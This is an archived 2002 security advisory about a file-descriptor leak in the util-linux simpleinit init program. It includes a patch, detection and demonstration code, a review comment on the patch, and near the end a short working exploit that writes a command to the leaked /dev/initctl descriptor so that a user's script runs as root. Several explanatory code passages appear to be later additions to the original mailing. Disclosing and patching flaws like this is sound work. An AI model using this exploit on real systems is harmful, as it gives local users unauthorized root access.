[UNIX] Simpleinit File Descriptor Security Vulnerability
From: support@securiteam.com Date: 06/24/02
From: support@securiteam.com To: list@securiteam.com Date: Mon, 24 Jun 2002 22:04:22 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Simpleinit File Descriptor Security Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://www.atnf.csiro.au/people/rgooch/linux/boot-scripts/> Simpleinit
is an init program for Linux systems. It is included in the util-linux
distribution. The vulnerability arises because Simpleinit leaves a file
descriptor open in some of its child processes.
DETAILS
Vulnerable systems:
* util-linux version 2.11r
Simpleinit leaves a file descriptor open in some child processes.
The descriptor is the one Simpleinit uses to read messages from the FIFO
/dev/initctl; the initctl, need and provide programs normally write to this
FIFO to pass instructions to Simpleinit. However, Simpleinit opens the FIFO
read-write, so any process that inherits the descriptor can write to it, and
thereby pass instructions to Simpleinit, without ever opening /dev/initctl
itself (and so regardless of the permissions on it).
(Opening the FIFO read-write is not a bug; rather it ensures there is
always a writer for the FIFO, so EOF is not reported.)
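The descriptor inheritance described above, together with the close-on-exec fix that the advisory's patch applies, as an added example that is not part of the original advisory or of simpleinit's own code: it builds a private FIFO under /tmp as a stand-in for /dev/initctl (an assumption of this example; the directory, file and function names are its own), opens it read-write exactly as simpleinit opens /dev/initctl, forks and execs a shell child in the role of a boot script or xdm session, and reports whether the child could still write through the inherited descriptor, with and without FD_CLOEXEC.

```c
#define _GNU_SOURCE /* mkdtemp(3), mkfifo(3) prototypes */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Create a private FIFO (stand-in for /dev/initctl), open it O_RDWR, optionally
 * mark it close-on-exec, then fork and exec /bin/sh, which tries to write a
 * message through the inherited descriptor number.
 * Returns 1 if the child wrote into the FIFO (descriptor survived exec),
 * 0 if the descriptor was closed across exec, -1 on setup failure. */
int child_can_write_fifo(int set_cloexec)
{
    char dir[] = "/tmp/initctl-demo-XXXXXX";   /* scratch directory, not /dev */
    char path[64], cmd[96], msg[32];
    int fd, status, leaked = 0;
    pid_t pid;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(path, sizeof path, "%s/initctl", dir);
    if (mkfifo(path, 0600) != 0) {
        rmdir(dir);
        return -1;
    }

    /* O_RDWR: this process is always a writer too, so reads never report EOF.
     * O_NONBLOCK: the verification read below cannot hang if nothing arrived. */
    fd = open(path, O_RDWR | O_NONBLOCK, 0);
    if (fd < 0) {
        unlink(path); rmdir(dir);
        return -1;
    }

    /* The advisory's fix: the descriptor must not outlive the exec() of a child. */
    if (set_cloexec && fcntl(fd, F_SETFD, FD_CLOEXEC) != 0) {
        close(fd); unlink(path); rmdir(dir);
        return -1;
    }

    /* Child: a shell that writes to the numbered descriptor it inherited.
     * Without FD_CLOEXEC the redirection succeeds; with it the shell gets EBADF
     * (stderr is silenced first so the EBADF message does not clutter output). */
    snprintf(cmd, sizeof cmd, "echo leaked 2>/dev/null >&%d", fd);
    pid = fork();
    if (pid < 0) {
        close(fd); unlink(path); rmdir(dir);
        return -1;
    }
    if (pid == 0) {
        execl("/bin/sh", "sh", "-c", cmd, (char *)0);
        _exit(127);
    }
    if (waitpid(pid, &status, 0) == pid && WIFEXITED(status) && WEXITSTATUS(status) == 0) {
        /* Confirm the message really landed in the FIFO, not just that sh exited 0. */
        ssize_t n = read(fd, msg, sizeof msg - 1);
        if (n > 0) {
            msg[n] = '\0';
            leaked = strcmp(msg, "leaked\n") == 0;
        }
    }

    close(fd);
    unlink(path);
    rmdir(dir);
    return leaked;
}

int main(void)
{
    printf("without FD_CLOEXEC: child can write to fifo = %d\n", child_can_write_fifo(0));
    printf("with    FD_CLOEXEC: child can write to fifo = %d\n", child_can_write_fifo(1));
    return 0;
}
```

Run as-is it prints 1 for the unprotected descriptor and 0 once FD_CLOEXEC is set. The child is handed the exact descriptor number, which is the situation of any boot script or xdm session started by simpleinit: nothing in the child has to know or open the FIFO's path.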
Impact:
A local user whose process inherits the file descriptor can easily make
Simpleinit execute an arbitrary program or script with root privileges.
There are assuredly numerous other local exploits.
Remote exploitation may also be possible, for example if an ftp server that
inherited the descriptor allows access to file descriptors through the /proc
filesystem.
Not all processes inherit the file descriptors. Getty processes started
from lines in /etc/inittab do not, so users logging in on the virtual
consoles will typically not have access to this exploit. On the other
hand, if the boot scripts start xdm, then a user logging in through xdm
will be able to use the file descriptor.
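A way to check whether a given process actually holds the leaked descriptor, added here as an example that is not part of the original advisory or of simpleinit: it walks /proc/self/fd and compares each link target against /dev/initctl, which is more reliable than assuming a fixed descriptor number (the exploit later in this advisory assumes 3). Function names are this example's own.

```c
#define _GNU_SOURCE /* readlink(2), dirfd(3) prototypes */
#include <dirent.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Scan /proc/self/fd and return the lowest descriptor number whose link
 * target equals `target`, or -1 if this process holds no such descriptor. */
int find_fd_pointing_at(const char *target)
{
    DIR *d = opendir("/proc/self/fd");
    struct dirent *ent;
    int found = -1;

    if (d == NULL)
        return -1;
    while ((ent = readdir(d)) != NULL) {
        char link[64], buf[PATH_MAX + 1];
        char *end;
        long n = strtol(ent->d_name, &end, 10);
        ssize_t len;

        if (*ent->d_name == '\0' || *end != '\0')
            continue;                      /* "." and ".." are not descriptors */
        if (n == dirfd(d))
            continue;                      /* the DIR's own descriptor */
        snprintf(link, sizeof link, "/proc/self/fd/%ld", n);
        len = readlink(link, buf, PATH_MAX);
        if (len < 0)
            continue;                      /* closed meanwhile, or unreadable */
        buf[len] = '\0';
        if (strcmp(buf, target) == 0 && (found < 0 || n < found))
            found = (int)n;
    }
    closedir(d);
    return found;
}

/* The check a user logging in through xdm, or a service started from the
 * boot scripts, would run: is simpleinit's /dev/initctl already open here? */
int inherited_initctl_fd(void)
{
    return find_fd_pointing_at("/dev/initctl");
}

int main(void)
{
    int fd = inherited_initctl_fd();
    if (fd < 0)
        puts("no /dev/initctl descriptor inherited");
    else
        printf("fd %d is /dev/initctl: this process can send commands to init\n", fd);
    return 0;
}
```

Because the comparison is on the resolved link target, the check does not depend on where the descriptor ended up numerically, and a descriptor to a FIFO that has since been deleted shows up with a " (deleted)" suffix and is not matched.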
Vendor notification:
<mailto:rgooch@atnf.csiro.au> Richard Gooch, the Simpleinit maintainer,
was notified of this problem on May 20, 2002.
On May 26, I learned of the <http://www.winterdrache.de/linux/newboot/>
simpleinit-msb variant, maintained by <mailto:m.s.b@gmx.net> Matthias
Benkmann, and notified him of this problem. He released a patched version
of simpleinit-msb the same day.
Unofficial patch:
--- login-utils/Simpleinit .c.orig 2001-09-29 11:09:10.000000000 -0400
+++ login-utils/Simpleinit .c 2002-05-23 22:16:07.000000000 -0400
@@ -203,6 +203,18 @@
if ( ( initctl_fd = open (initctl_name, O_RDWR, 0) ) < 0 )
err ( _("error opening fifo\n") );
}
+ if ( initctl_fd >= 0 )
+ if ( fcntl (initctl_fd, F_SETFD, FD_CLOEXEC) != 0 ) {
+ err ( _("error setting close-on-exec on
/dev/initctl") );
+ /* Can the fcntl ever fail? If it does, and we
leave
+ the descriptor open in child processes, then
any
+ process on the system will be able to write to
+ /dev/initctl and have us execute arbitrary
commands
+ as root. So let's refuse to use the fifo in
this
+ case. */
+ close(initctl_fd);
+ initctl_fd = -1;
+ }
if ( want_single || (access (_PATH_SINGLE, R_OK) == 0) ) do_single ();
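Review bot: the hunk as quoted here will not apply or compile as-is: the mailer has wrapped the string literal `_("error setting close-on-exec on` / `/dev/initctl")` and the comment lines after it across line breaks, so those lines must be re-joined before the patch is used. Two smaller points: the outer `if ( initctl_fd >= 0 )` guards a braced inner `if` without braces of its own, which is legal but easy to misread, so give it braces; and FD_CLOEXEC only drops the descriptor across exec, so the comment should say that a child simpleinit forks without exec'ing would still inherit it (acceptable for the exec'd boot scripts and gettys this patch is about). Closing the fifo and setting `initctl_fd = -1` when the fcntl fails is the right conservative fallback, since a descriptor that cannot be made close-on-exec would otherwise leak into every child.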
Exploit:
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "simpleinit.h" /* From the util-linux source: COMMAND_SIZE, COMMAND_NEED, struct command_struct */

int main(void)
{
    int fd = 3; /* the inherited /dev/initctl descriptor; 3 assumes it is the first one after stdin/stdout/stderr */
    char buf[COMMAND_SIZE];
    struct command_struct* cmd = (struct command_struct*) buf;

    memset(buf, '\0', sizeof(buf));
    cmd->command = COMMAND_NEED;          /* the same request the need(8) client sends */
    cmd->pid = 17;                        /* bogus requester pids; the real client fills these in */
    cmd->ppid = 16;
    strcpy(cmd->name, "/home/pat/x/foo"); /* foo will be run as root */

    /* one fixed-size message, the same size simpleinit reads from the fifo */
    if (write(fd, buf, COMMAND_SIZE) != COMMAND_SIZE) {
        perror("write to inherited /dev/initctl descriptor");
        return 1;
    }
    return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:patsmith@pobox.com> Patrick
Smith.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.